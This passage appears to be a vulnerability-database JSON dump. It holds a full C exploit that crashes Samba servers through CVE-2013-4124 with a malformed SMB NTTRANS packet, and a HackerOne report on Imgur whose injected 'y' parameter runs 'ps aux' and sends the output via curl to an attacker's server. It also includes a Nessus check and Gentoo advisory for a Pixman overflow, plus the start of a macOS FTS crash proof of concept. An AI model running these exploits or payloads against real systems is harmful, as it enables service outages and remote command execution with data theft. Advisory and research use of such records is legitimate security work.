errorclass, reserved, errorcode[2];\r\n uint8 flags;\r\n uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];\r\n};\r\n\r\nstruct negprot_reply_header\r\n{ uint8 wordcount;\r\n uint8 dialectindex[2];\r\n uint8 securitymode;\r\n uint16 maxmpxcount, maxvccount;\r\n uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;\r\n uint16 timezone;\r\n uint8 keylen;\r\n uint16 bytecount;\r\n};\r\n\r\nstruct sesssetupx_request_header\r\n{ uint8 wordcount, command, reserved;\r\n uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];\r\n uint8 sessionid[4];\r\n uint8 ipasswdlen[2], passwdlen[2];\r\n uint8 reserved2[4], capabilities[4];\r\n};\r\n\r\nstruct sesssetupx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];\r\n};\r\n\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n};\r\n\r\nstruct tconx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];\r\n};\r\n\r\nstruct nttrans_primary_request_header\r\n{ \r\n uint8 wordcount; \r\n uint8 maxsetupcount; \r\n uint8 flags[2];\r\n uint8 totalparamcount[4]; \r\n uint8 totaldatacount[4];\r\n uint8 maxparamcount[4];\r\n uint8 maxdatacount[4];\r\n uint8 paramcount[4];\r\n uint8 paramoffset[4];\r\n uint8 datacount[4];\r\n uint8 dataoffset[4]; // XXXX 0xf000000\r\n uint8 setupcount; \r\n uint8 function[2]; \r\n uint8 bytecount[2];\r\n};\r\n\r\n#define SMB_NEGPROT 0x72\r\n#define SMB_SESSSETUPX 0x73\r\n#define SMB_TCONX 0x75\r\n#define SMB_TRANS2 0x32\r\n#define SMB_NTTRANS 0xA0\r\n#define SMB_NTTRANSCREATE 0x01\r\n#define SMB_TRANS2OPEN 0x00\r\n#define SMB_SESSIONREQ 0x81\r\n#define SMB_SESSION 0x00\r\n\r\nuint32 sessionid, PARAMBASE = 0x81c0000;\r\nchar *tconx_servername;\r\nint tid, pid, uid;\r\n\r\n#define STACKBOTTOM 0xbfffffff\r\n#define STACKBASE 0xbfffd000\r\n#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))\r\n\r\nchar *netbios_encode_name(char *name, int type)\r\n{ char plainname[16], c, *encoded, *ptr;\r\n int i, len = strlen(name);\r\n if ((encoded = malloc(34)) == NULL)\r\n { fprintf(stderr, \"malloc() failed\\n\");\r\n exit(-1);\r\n }\r\n ptr = encoded;\r\n strncpy(plainname, name, 15);\r\n *ptr++ = 0x20;\r\n for (i = 0; i < 16; i++)\r\n { if (i == 15) c = type;\r\n else \r\n { if (i < len) c = toupper(plainname[i]);\r\n else c = 0x20;\r\n }\r\n *ptr++ = (((c >> 4) & 0xf) + 0x41);\r\n *ptr++ = ((c & 0xf) + 0x41);\r\n }\r\n *ptr = '\\0';\r\n return encoded;\r\n}\r\n\r\nvoid construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)\r\n{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;\r\n uint16 nlen;\r\n\r\n// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..\r\n if (len > 65535) nlen = 65535;\r\n else nlen = htons(len);\r\n\r\n memset((void *)nbt_hdr, '\\0', sizeof (struct nbt_session_header));\r\n \r\n nbt_hdr->type = type;\r\n nbt_hdr->flags = flags;\r\n memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));\r\n}\r\n\r\n// caller zorgt voor juiste waarde van ptr.\r\nvoid construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, \r\n uint16 uid, uint16 mid)\r\n{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;\r\n\r\n memset(base_hdr, '\\0', sizeof (struct smb_base_header));\r\n\r\n memcpy(base_hdr->protocol, \"\\xffSMB\", 4);\r\n\r\n base_hdr->command = command;\r\n base_hdr->flags = flags;\r\n\r\n memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));\r\n memcpy(&base_hdr->tid, &tid, sizeof (uint16));\r\n memcpy(&base_hdr->pid, &pid, sizeof (uint16));\r\n memcpy(&base_hdr->uid, &uid, sizeof (uint16));\r\n memcpy(base_hdr->mid, &mid, sizeof (uint16));\r\n}\r\n\r\nvoid construct_sesssetupx_header(char *ptr)\r\n{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;\r\n uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;\r\n uint32 capabilities = 0x50;\r\n\r\n memset(sx_hdr, '\\0', sizeof (struct sesssetupx_request_header));\r\n\r\n sx_hdr->wordcount = 13;\r\n sx_hdr->command = 0xff;\r\n memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));\r\n memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));\r\n memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));\r\n memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));\r\n memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));\r\n}\r\n\r\n/*\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];\r\n}; */\r\nvoid construct_tconx_header(char *ptr)\r\n{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;\r\n uint16 passwdlen = 1, bytecount;\r\n char *data;\r\n\r\n memset(tx_hdr, '\\0', sizeof (struct tconx_request_header));\r\n\r\n bytecount = strlen(tconx_servername) + 15; \r\n\r\n if ((data = malloc(bytecount)) == NULL)\r\n { fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n memcpy(data, \"\\x00\\x5c\\x5c\", 3);\r\n memcpy(data + 3, tconx_servername, strlen(tconx_servername));\r\n memcpy(data + 3 + strlen(tconx_servername), \"\\x5cIPC\\x24\\x00\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\", 12);\r\n\r\n tx_hdr->wordcount = 4;\r\n tx_hdr->xcommand = 0xff;\r\n\r\n memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));\r\n memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));\r\n\r\n memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);\r\n}\r\n\r\nvoid nbt_session_request(int fd, char *clientname, char *servername)\r\n{ \r\n char *cn, *sn;\r\n char packet[sizeof (struct nbt_session_header) + (34 * 2)];\r\n\r\n construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n\r\n tconx_servername = servername;\r\n\r\n sn = netbios_encode_name(servername, 0x20);\r\n cn = netbios_encode_name(clientname, 0x00);\r\n\r\n memcpy(packet + sizeof (struct nbt_session_header), sn, 34);\r\n memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);\r\n\r\n write(fd, packet, sizeof (packet));\r\n close(fd);\r\n\r\n free(cn);\r\n free(sn);\r\n}\r\n\r\nvoid process_nbt_session_reply(int fd)\r\n{ struct nbt_session_header nbt_hdr;\r\n char *errormsg;\r\n uint8 errorcode;\r\n int size, len = 0;\r\n\r\n if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (nbt_hdr))\r\n { close(fd);\r\n fprintf(stderr, \"read() a broken packet, aborting.\\n\"); \r\n exit(-1);\r\n }\r\n memcpy(&len, &nbt_hdr.len, sizeof (uint16));\r\n\r\n if (len)\r\n { read(fd, (void *)&errorcode, 1); \r\n close(fd);\r\n switch (errorcode)\r\n { case 0x80 : errormsg = \"Not listening on called name\"; break;\r\n case 0x81 : errormsg = \"Not listening for calling name\"; break;\r\n case 0x82 : errormsg = \"Called name not present\"; break;\r\n case 0x83 : errormsg = \"Called name present, but insufficient resources\"; break;\r\n case 0x8f : errormsg = \"Unspecified error\"; break;\r\n default : errormsg = \"Unspecified error (unknown error code received!)\"; break;\r\n }\r\n fprintf(stderr, \"session request denied, reason: '%s' (code %i)\\n\", errormsg, errorcode);\r\n exit(-1);\r\n }\r\n printf(\"session request granted\\n\");\r\n}\r\n\r\nvoid negprot_request(int fd)\r\n{ struct variable_data_header data;\r\n char dialects[] = \"\\x2PC NETWORK PROGRAM 1.0\\x0\\x2MICROSOFT NETWORKS 1.03\\x0\\x2MICROSOFT NETWORKS 3.0\\x0\\x2LANMAN1.0\\x0\" \\\r\n \"\\x2LM1.2X002\\x0\\x2Samba\\x0\\x2NT LANMAN 1.0\\x0\\x2NT LM 0.12\\x0\\x2\"\"FLATLINE'S KWAADWAAR\"; \r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];\r\n int dlen = htons(sizeof (dialects));\r\n\r\n memset(&data, '\\0', sizeof (data));\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n pid = getpid();\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);\r\n\r\n memcpy(&data.bytecount, &dlen, sizeof (uint16));\r\n\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), \r\n dialects, sizeof (dialects));\r\n\r\n if (write(fd, packet, sizeof (packet)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n}\r\n\r\nvoid process_negprot_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct negprot_reply_header *np_reply_hdr;\r\n char packet[1024];\r\n int size;\r\n uint16 pid_reply;\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header)));\r\n\r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n\r\n memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));\r\n memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));\r\n if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)\r\n { close(fd);\r\n fprintf(stderr, \"protocol negotiation failed\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"protocol negotiation complete\\n\");\r\n}\r\n\r\nvoid sesssetupx_request(int fd)\r\n{ uint8 data[] = \"\\x12\\x0\\x0\\x0\\x55\\x6e\\x69\\x78\\x00\\x53\\x61\\x6d\\x62\\x61\";\r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header) + sizeof (data)];\r\n int size;\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);\r\n construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header), &data, sizeof (data));\r\n\r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid process_sesssetupx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct sesssetupx_reply_header *sx_hdr;\r\n char packet[1024];\r\n int size, len;\r\n\r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n memcpy(&len, &nbt_hdr->len, sizeof (uint16));\r\n memcpy(&uid, &base_hdr->uid, sizeof (uint16));\r\n\r\n if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)\r\n { close(fd);\r\n fprintf(stderr, \"session setup failed\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"session setup complete, got assigned uid %i\\n\", uid);\r\n}\r\n\r\nvoid tconx_request(int fd)\r\n{ \r\n char *packet;\r\n int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +\r\n sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;\r\n\r\n if ((packet = malloc(pktsize)) == NULL)\r\n { close(fd);\r\n fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);\r\n construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n if ((size = write(fd, packet, pktsize)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n\r\n free(packet);\r\n\r\n if (size != pktsize)\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n } \r\n}\r\n\r\nvoid process_tconx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct tconx_reply_header *tx_hdr;\r\n char packet[1024];\r\n int size, bytecount;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n memcpy(&tid, &base_hdr->tid, sizeof (uint16));\r\n memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));\r\n\r\n printf(\"tree connect complete, got assigned tid %i\\n\", tid);\r\n}\r\n\r\nvoid nttrans_request(int fd) { \r\n // packet = nbt session header + smb base header + nttrans header!\r\n char packet[sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header) + \r\n sizeof (struct nttrans_primary_request_header)];\r\n struct nttrans_primary_request_header nttrans_hdr; // nttrans header!\r\n int size=0;\r\n int function = SMB_NTTRANSCREATE; // NTTRANSCREATE!\r\n int totalparamcount = TOTALCOUNT;\r\n int totaldatacount = 0;\r\n uint8 setupcount = 0;\r\n\r\n memset(&nttrans_hdr, 0, sizeof nttrans_hdr);\r\n\r\n // construct nbt session header\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n // construct smb base header\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1);\r\n\r\n // construct nttrans header\r\n nttrans_hdr.paramoffset[0] = '\\x00';\r\n nttrans_hdr.paramoffset[1] = '\\x00';\r\n nttrans_hdr.paramoffset[2] = '\\x10';\r\n nttrans_hdr.paramoffset[3] = '\\xff';\r\n nttrans_hdr.dataoffset[0] = '\\x00'; // XXX data offset 0xff100000 to integer wrap\r\n nttrans_hdr.dataoffset[1] = '\\x00'; // the offset exploits the security bug of CVE-2013-4124\r\n nttrans_hdr.dataoffset[2] = '\\x10'; // samba remote dos\r\n nttrans_hdr.dataoffset[3] = '\\xff';\r\n\r\n nttrans_hdr.wordcount = 19 + setupcount;\r\n memcpy(&nttrans_hdr.function, &function, sizeof (uint16));\r\n memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32));\r\n memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr);\r\n\r\n // send samba packet!\r\n size = write(fd, packet, sizeof (packet));\r\n close(fd);\r\n\r\n}\r\n\r\nstatic char banner[]={\r\n\" ___ ___ \\n\" \\\r\n\" / _ \\\\ / _ \\\\ \\n\" \\\r\n\" __ __| (_) || | | | ___ \\n\" \\\r\n\" \\\\ \\\\/ / \\\\__. || | | | / __| \\n\" \\\r\n\" > < / / | |_| || (__ \\n\" \\\r\n\" /_/\\\\_\\\\ /_/ \\\\___/ \\\\___| \\n\" \\\r\n};\r\n\r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n struct sockaddr_in s_in;\r\n char target_ip[16];\r\n int smb_port=139;\r\n \r\n\r\n printf(\"%s\\n\\nsamba nttrans reply exploit\\n\\n\", banner);\r\n\r\n if(argc < 2){\r\n fprintf(stderr, \"samba nttrans reply exploit Usage:\\n\\n./samba_exploit [target ip addr]\\n\\n\");\r\n exit(-1);\r\n }\r\n\r\n strncpy(target_ip, argv[1], 16);\r\n \r\n memset(&s_in, 0, sizeof (s_in));\r\n s_in.sin_family = AF_INET;\r\n s_in.sin_port = htons(smb_port); // samba port=139/tcp\r\n s_in.sin_addr.s_addr = inet_addr(target_ip);\r\n\r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n connect(fd, (struct sockaddr *)&s_in, sizeof (s_in));\r\n\r\n // nbt(netbios over tcpip, nbtstat) session request\r\n nbt_session_request(fd, \"BOSSA\", \"SAMBA\"); // adjust computer names(clientname, servername)\r\n process_nbt_session_reply(fd);\r\n\r\n // protocol negotiation\r\n negprot_request(fd);\r\n process_negprot_reply(fd);\r\n \r\n // session setup\r\n sesssetupx_request(fd); // setup request\r\n process_sesssetupx_reply(fd); // setup reply\r\n\r\n // tree connection setup\r\n tconx_request(fd);\r\n process_tconx_reply(fd);\r\n\r\n // exploit!\r\n printf(\"[*] nttrans reply exploit!\\n\");\r\n nttrans_request(fd);\r\n\r\n close(fd);\r\n\r\n return 0;\r\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27778/"}], "hackerone": [{"lastseen": "2018-04-19T17:34:08", "bulletinFamily": "bugbounty", "bounty": 5000.0, "description": "### Summary\n\nThe `y` parameter of `/edit/process` endpoint (with `a=crop`) is vulnerable to command-line argument injection to something that appears to be GraphicsMagick utility (probably `gm convert`). Due to GraphicsMagick's hacker-friendly processing of `|`-starting filenames supplied to `-write` option, it leads to command execution.\n\n### Reproduction steps\n\n0. Enable Burp Proxy or similar software that allows you to log and edit HTTP requests.\n1. Login into your imgur account and upload an image.\n2. Move your mouse over the image, click on the tiny button with pencil on it, then click \"Edit\".\n3. Select a random rectangle on the image, then click \"Apply\".\n4. In the burp suite, you will see a request to an URL like this: `http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0&w=700&h=746&random=4011802027746510`\n\n Change the `y` parameter of the request so it becomes `0 -write |ps${IFS}aux|curl${IFS}http://<your-server>${IFS}-d${IFS}@-`. \n\n The full URL after the change must look like `http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0%20-write%20|ps${IFS}aux|curl${IFS}http://<your-server>{IFS}-d${IFS}@-&w=700&h=830&random=9905392865702303`, note that you have to change `<your-server>` to a webserver under your control).\n\n5. Fire a request to the modified URL. The command (`ps aux|curl http://<your-server> -d @-`) will be executed somewhere inside imgur, and you will get a HTTP request to `<your-server>` with the result of `ps aux` in the POST body. You can replace `ps aux` with another command (but you have to write `${IFS}` instead of spaces).\n\n### Detailed description\n\nI was searching for CVE-2016-10033-like vulnerabilities on several bugbounty sites when I noticed strange behaviour of the mentioned parameter. The vulnerability exists because the user input (the contents of `y` GET parameter) goes into a shell command. While all special characters (like `|`, `$` and so on) seem to be escaped, the space character is not. This allows the attacker to insert additinal command line arguments. The common reason for such behaviour is `escapeshellcmd` PHP function, but that can also be some kind of custom input filtering/processing.\n\nThe rest of the exploitation depends on the program that is executed (we need to find out if it supports any dangerous command-line options). Common sense suggests that the external command launched by \"Crop/Resize\" function must be some image processing tool. The most popular one is ImageMagick/GraphicsMagick, so I appended ` -rotate 90` to the parameter and it succeded --- I saw lying Trump (I mean, the image was rotated). After more tries I was sure it's GraphicsMagick (probably `gm convert` utility). I read the documentation and found that `-write` argument supports perl-style filenames starting with a pipe --- in this case the rest of the filename must be a command to execute.\n\n### Mitigation\n\nProbably either some kind of custom processing or `escapeshellcmd` function is used to construct the command line. In both cases, replace it with applying `escapeshellarg` to individual arguments. In the second case, you probably want to run `grep -R escapeshellcmd <path to the source code>` to find more vulns :-)\n", "modified": "2017-04-26T21:30:28", "published": "2017-03-12T03:46:46", "id": "H1:212696", "href": "https://hackerone.com/reports/212696", "type": "hackerone", "title": "Imgur: RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-02-21T01:28:42", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201612-37 (Pixman: Buffer overflow)\n\n In pixman-general, careless computations done with the ‘dest_buffer’\n pointer may overflow, failing the buffer upper limit check.\n Impact :\n\n A remote attacker could possibly cause a Denial of Service condition, or execute arbitrary code with the privileges of the process.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2017-10-02T00:00:00", "id": "GENTOO_GLSA-201612-37.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=95740", "published": "2016-12-13T00:00:00", "title": "GLSA-201612-37 : Pixman: Buffer overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-37.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95740);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2017/10/02 21:12:27 $\");\n\n script_xref(name:\"GLSA\", value:\"201612-37\");\n\n script_name(english:\"GLSA-201612-37 : Pixman: Buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-37\n(Pixman: Buffer overflow)\n\n In pixman-general, careless computations done with the ‘dest_buffer’\n pointer may overflow, failing the buffer upper limit check.\n \nImpact :\n\n A remote attacker could possibly cause a Denial of Service condition, or\n execute arbitrary code with the privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.x.org/archives/xorg-announce/2015-September/002637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201612-37\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Pixman users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-libs/pixman-0.32.8'\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pixman\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"x11-libs/pixman\", unaffected:make_list(\"ge 0.32.8\"), vulnerable:make_list(\"lt 0.32.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Pixman\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2016-12-13T09:58:27", "bulletinFamily": "unix", "description": "### Background\n\nPixman is a pixel manipulation library.\n\n### Description\n\nIn pixman-general, careless computations done with the \u2018dest_buffer\u2019 pointer may overflow, failing the buffer upper limit check. \n\n### Impact\n\nA remote attacker could possibly cause a Denial of Service condition, or execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Pixman users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-libs/pixman-0.32.8\"", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "href": "https://security.gentoo.org/glsa/201612-37", "id": "GLSA-201612-37", "title": "Pixman: Buffer overflow", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:58", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-08T00:00:00", "published": "2015-12-08T00:00:00", "href": "https://packetstormsecurity.com/files/134710/Mac-OS-X-10.11-FTS-Buffer-Overflow.html", "id": "PACKETSTORM:134710", "type": "packetstorm", "title": "Mac OS X 10.11 FTS Buffer Overflow", "sourceData": "`MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow \nCredit: Maksymilian Arciemowicz ( CXSECURITY ) \nWebsite: \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \n \n \nAffected software: \n- MACOS's Commands such as: ls, find, rm \n- iPhone 4s and later, \n- Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes \n- Apple TV (4th generation) \n- probably more \n \nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. \n \nPoC: \nCreate an direcotry and perform the following actions: \n \n \n# for i in {1..1024}; do mkdir B && cd B; done \n... \ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory \n \n \nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. \n \n \n# for i in {1..1024}; do cd .. ; done \n \n \nThen you can perform recursive 'ls' command. Let's run it ten times: \n \n \n# for i in {1..10}; do ls -laR > /dev/null; done \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nSegmentation fault: 11 \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \n \n \ncrash randometly. Let's see valgrind and lldb \n \n \nLLDB: \n... 